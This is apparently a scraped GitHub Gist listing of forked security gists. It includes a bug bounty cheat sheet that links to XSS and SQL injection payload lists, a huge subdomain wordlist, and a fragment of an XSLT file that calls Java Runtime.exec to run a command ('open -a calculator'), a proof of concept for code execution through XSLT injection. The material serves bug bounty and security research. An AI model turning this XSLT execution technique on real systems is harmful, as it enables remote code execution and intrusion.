cmd@fb:/tmp|❯ wc -l 33m-subdomain-wordlist.txt
33927885 33m-subdomain-wordlist.txt
jarek-bir
jarek-bir
/ 🔥Complete Bug Bounty Cheat Sheet🔥
Created
August 11, 2024 19:18
— forked from cyberheartmi9/🔥Complete Bug Bounty Cheat Sheet🔥
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| 🔥Complete Bug Bounty Cheat Sheet🔥 | |
| XSS | |
| https://github.com/EdOverflow/bugbounty-cheatsheet/blob/master/cheatsheets/xss.md | |
| https://github.com/ismailtasdelen/xss-payload-list | |
| SQLi | |
| https://github.com/EdOverflow/bugbounty-cheatsheet/blob/master/cheatsheets/sqli.md |
jarek-bir
/ subdomain_wordlist.md
Created
August 1, 2024 23:18
— forked from cihanmehmet/subdomain_wordlist.md
Subdomain Wordlist
jarek-bir
/ select.xslt
Created
July 28, 2023 11:32
— forked from phith0n/select.xslt
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform"> | |
| <xsl:template> | |
| <!-- #113 Methodref: java/lang/Runtime.getRuntime:()Ljava/lang/Runtime; --> | |
| <!-- #119 Methodref: java/lang/Runtime.exec:(Ljava/lang/String;)Ljava/lang/Process; --> | |
| <!-- #114 Utf8: open -a calculator --> | |
| <!-- #115 String: touch /tmp/pwn --> | |
| <xsl:value-of select="Runtime:exec(Runtime:getRuntime(),'open -a calculator')" xmlns:Runtime="java.lang.Runtime"/> | |
| <xsl:value-of select="at:new()" xmlns:at="org.apache.xalan.xsltc.runtime.AbstractTranslet"/> | |
| <!-- #132 Utf8: <init> --> | |
| <AAA select="<init>"/> |